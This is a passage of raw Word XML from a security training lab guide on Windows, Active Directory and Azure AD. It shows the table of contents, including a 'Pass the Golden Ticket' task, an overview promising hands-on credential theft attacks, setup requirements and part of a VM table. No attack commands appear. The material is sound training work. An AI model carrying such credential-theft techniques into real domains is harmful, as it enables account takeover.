              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44074057" w:history="1">
            <w:r w:rsidR="005A25CB" w:rsidRPr="00BC2ACA">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 2: Pass the Golden Ticket</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44074057 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5ED57945" w14:textId="4F9A0FC6" w:rsidR="005A25CB" w:rsidRDefault="00A608B1">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44074058" w:history="1">
            <w:r w:rsidR="005A25CB" w:rsidRPr="00BC2ACA">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Questions:</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44074058 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E9A333E" w14:textId="6F0182A3" w:rsidR="005A25CB" w:rsidRDefault="00A608B1">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44074059" w:history="1">
            <w:r w:rsidR="005A25CB" w:rsidRPr="00BC2ACA">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>After the Lab</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44074059 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CACAFEF" w14:textId="09148733" w:rsidR="005A25CB" w:rsidRDefault="00A608B1">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44074060" w:history="1">
            <w:r w:rsidR="005A25CB" w:rsidRPr="00BC2ACA">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 1: Stop and deallocated all the VMs</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44074060 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="005A25CB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A39BBE3" w14:textId="47E63891" w:rsidR="001A039D" w:rsidRPr="00E512F9" w:rsidRDefault="00952D66" w:rsidP="001A039D">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="41C8F396" w14:textId="77777777" w:rsidR="00D64AFD" w:rsidRPr="007E3D91" w:rsidRDefault="00A608B1">
          <w:pPr>
            <w:sectPr w:rsidR="00D64AFD" w:rsidRPr="007E3D91" w:rsidSect="00D64AFD">
              <w:headerReference w:type="even" r:id="rId12"/>
              <w:headerReference w:type="default" r:id="rId13"/>
              <w:headerReference w:type="first" r:id="rId14"/>
              <w:pgSz w:w="12240" w:h="15840"/>
              <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="720" w:footer="720" w:gutter="0"/>
              <w:pgNumType w:start="1"/>
              <w:cols w:space="720"/>
              <w:titlePg/>
              <w:docGrid w:linePitch="360"/>
            </w:sectPr>
          </w:pPr>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="4D50BA9C" w14:textId="77777777" w:rsidR="00A973CD" w:rsidRDefault="00CF6C88" w:rsidP="004F56DB">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc44074048"/>
      <w:bookmarkStart w:id="4" w:name="_Toc492638965"/>
      <w:bookmarkStart w:id="5" w:name="_Toc492640497"/>
      <w:bookmarkStart w:id="6" w:name="_Toc492640575"/>
      <w:bookmarkStart w:id="7" w:name="_Toc492652744"/>
      <w:r w:rsidRPr="00CF6C88">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Windows security, </w:t>
      </w:r>
      <w:r>
        <w:t>Active Directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6C88">
        <w:t xml:space="preserve"> and Azure AD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B4B6B">
        <w:t>Lab</w:t>
      </w:r>
      <w:r w:rsidR="00987614">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A460B">
        <w:t>step-by-s</w:t>
      </w:r>
      <w:r w:rsidR="00A973CD">
        <w:t>tep</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="00A973CD" w:rsidRPr="00A973CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE7E467" w14:textId="77777777" w:rsidR="00765A29" w:rsidRDefault="00765A29" w:rsidP="00765A29">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc44074049"/>
      <w:r>
        <w:t>Abstr</w:t>
      </w:r>
      <w:r w:rsidR="002A460B">
        <w:t>act and learning o</w:t>
      </w:r>
      <w:r>
        <w:t>bjectives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79391D30" w14:textId="77777777" w:rsidR="009B4B6B" w:rsidRDefault="00F36A4D" w:rsidP="009B4B6B">
      <w:r>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="009B4B6B">
        <w:t>training</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is designed to provide exposure to many of Microsoft </w:t>
      </w:r>
      <w:r w:rsidR="009B4B6B">
        <w:t>Windows, Active Directory and Azure Active Directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B4B6B">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ecurity features. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A3D3EC" w14:textId="77777777" w:rsidR="00765A29" w:rsidRPr="00765A29" w:rsidRDefault="00F36A4D" w:rsidP="000F793C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0E1DE5" w14:textId="77777777" w:rsidR="00A973CD" w:rsidRPr="00F954C8" w:rsidRDefault="00A973CD" w:rsidP="00A973CD">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc44074050"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="50DE2715" w14:textId="4156EEA5" w:rsidR="008A1AC1" w:rsidRDefault="008A1AC1" w:rsidP="008A1AC1">
      <w:r w:rsidRPr="00877619">
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:r>
        <w:t>Lab</w:t>
      </w:r>
      <w:r w:rsidRPr="00877619">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D4008A">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00877619">
        <w:t xml:space="preserve">attendees will </w:t>
      </w:r>
      <w:r w:rsidR="00D4008A">
        <w:t xml:space="preserve">use security tools to observe and perform credentials theft attacks. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0E018C" w14:textId="77777777" w:rsidR="00A973CD" w:rsidRPr="00F954C8" w:rsidRDefault="00A973CD" w:rsidP="00A973CD">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc44074051"/>
      <w:r>
        <w:t>Requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:bookmarkEnd w:id="5"/>
    <w:bookmarkEnd w:id="6"/>
    <w:bookmarkEnd w:id="7"/>
    <w:p w14:paraId="2021B920" w14:textId="77777777" w:rsidR="00D06D55" w:rsidRDefault="00D06D55" w:rsidP="00D06D55">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Attendee’s machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C7B380" w14:textId="77777777" w:rsidR="00D06D55" w:rsidRDefault="00D06D55" w:rsidP="00D06D55">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ideal resolution 1920 x 1080 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303E1C27" w14:textId="77777777" w:rsidR="00D06D55" w:rsidRDefault="00D06D55" w:rsidP="00D06D55">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>An Internet browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CAD829" w14:textId="77777777" w:rsidR="00D06D55" w:rsidRDefault="00D06D55" w:rsidP="00D06D55">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>An RDP client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D38E7C" w14:textId="77777777" w:rsidR="00D06D55" w:rsidRDefault="00D06D55" w:rsidP="00D06D55">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Internet access without restriction on outbound connections. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">The following outbound TCP port must be accessible : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300E12F9" w14:textId="77777777" w:rsidR="00D06D55" w:rsidRPr="00B36AD0" w:rsidRDefault="00D06D55" w:rsidP="00D06D55">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002935CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP/80 and TCP/443</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to reach Azure Portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FAB1D3" w14:textId="77777777" w:rsidR="00D06D55" w:rsidRDefault="00D06D55" w:rsidP="00D06D55">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002935CB">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP/3389</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> to establish RDP remote connection to virtual machines exposed directly to Internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A84BD8C" w14:textId="77777777" w:rsidR="00D06D55" w:rsidRPr="00D64D39" w:rsidRDefault="00D06D55" w:rsidP="00D06D55">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51689227" w14:textId="77777777" w:rsidR="00D06D55" w:rsidRPr="008D2065" w:rsidRDefault="00D06D55" w:rsidP="00D06D55">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002935CB">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP/(49152 to 65535)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> to establish RDP remote connection to virtual machines exposed by a Load Balancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0B940D" w14:textId="77777777" w:rsidR="009B4B6B" w:rsidRPr="00327FB4" w:rsidRDefault="009B4B6B" w:rsidP="009B4B6B"/>
    <w:p w14:paraId="0E27B00A" w14:textId="77777777" w:rsidR="00745F44" w:rsidRDefault="00745F44">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="0078D7" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="014FBC08" w14:textId="77777777" w:rsidR="00A973CD" w:rsidRDefault="00A973CD" w:rsidP="00A973CD">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc44074052"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Before the </w:t>
      </w:r>
      <w:r w:rsidR="008A1AC1">
        <w:t>exercise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="40325279" w14:textId="77777777" w:rsidR="00A973CD" w:rsidRPr="00A973CD" w:rsidRDefault="00F36A4D" w:rsidP="00A973CD">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Duration: </w:t>
      </w:r>
      <w:r w:rsidR="008A1AC1">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00A973CD">
        <w:t xml:space="preserve"> minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AD967C" w14:textId="77777777" w:rsidR="00A973CD" w:rsidRDefault="00F36A4D" w:rsidP="00A973CD">
      <w:r w:rsidRPr="00877619">
        <w:t xml:space="preserve">Synopsis: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:r w:rsidR="008A1AC1">
        <w:t>section</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, you will set up your environment for use in the rest of the </w:t>
      </w:r>
      <w:r w:rsidR="009B4B6B">
        <w:t>Lab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00877619">
        <w:t xml:space="preserve">You should </w:t>
      </w:r>
      <w:r w:rsidR="008A1AC1">
        <w:t>have the following environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4338A578" w14:textId="4E3828E0" w:rsidR="00CF763D" w:rsidRPr="002F69F7" w:rsidRDefault="00CF763D" w:rsidP="00CF763D">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc519699424"/>
      <w:bookmarkStart w:id="13" w:name="_Toc44074053"/>
      <w:r w:rsidRPr="002F69F7">
        <w:t>List of VM to start</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="6F30C72E" w14:textId="3C5FF6EC" w:rsidR="00CF763D" w:rsidRPr="003E7A19" w:rsidRDefault="00CF763D" w:rsidP="00CF763D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E7A19">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember to start the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>DC</w:t>
      </w:r>
      <w:r w:rsidRPr="003E7A19">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> first and to wait</w:t>
      </w:r>
      <w:r w:rsidR="00A608B1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="003E7A19">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> minute before starting the other VMs.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableauGrille2-Accentuation1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1914"/>
        <w:gridCol w:w="1914"/>
        <w:gridCol w:w="3450"/>
        <w:gridCol w:w="1165"/>
      </w:tblGrid>
      <w:tr w:rsidR="004F1CB6" w14:paraId="618FE0A2" w14:textId="77777777" w:rsidTr="004F4807">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="250"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1914" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DBA1870" w14:textId="7E353A84" w:rsidR="004F1CB6" w:rsidRDefault="004F1CB6" w:rsidP="00E162AD">
            <w:r>
              <w:t>Name of VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1914" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D5620B4" w14:textId="20BE6A0C" w:rsidR="004F1CB6" w:rsidRDefault="004F1CB6" w:rsidP="00E162AD">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3450" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C316FEF" w14:textId="77777777" w:rsidR="004F1CB6" w:rsidRDefault="004F1CB6" w:rsidP="00E162AD">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>OS Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F9FF5CB" w14:textId="77777777" w:rsidR="004F1CB6" w:rsidRDefault="004F1CB6" w:rsidP="00E162AD">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F1CB6" w14:paraId="60F35E0A" w14:textId="77777777" w:rsidTr="004F4807">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914" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A9DDA19" w14:textId="2D798F18" w:rsidR="004F1CB6" w:rsidRDefault="004F1CB6" w:rsidP="00E162AD">
            <w:r w:rsidRPr="00C40ECB">
              <w:rPr>
                <w:rFonts w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
            <w:r w:rsidRPr="00C40ECB">
              <w:rPr>
                <w:rFonts w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-TD11-DC1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1914" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67A99969" w14:textId="5F625683" w:rsidR="004F1CB6" w:rsidRDefault="004F1CB6" w:rsidP="00E162AD">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>CSI-TD11-DC1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3450" w:type="dxa"/>
          </w:tcPr>
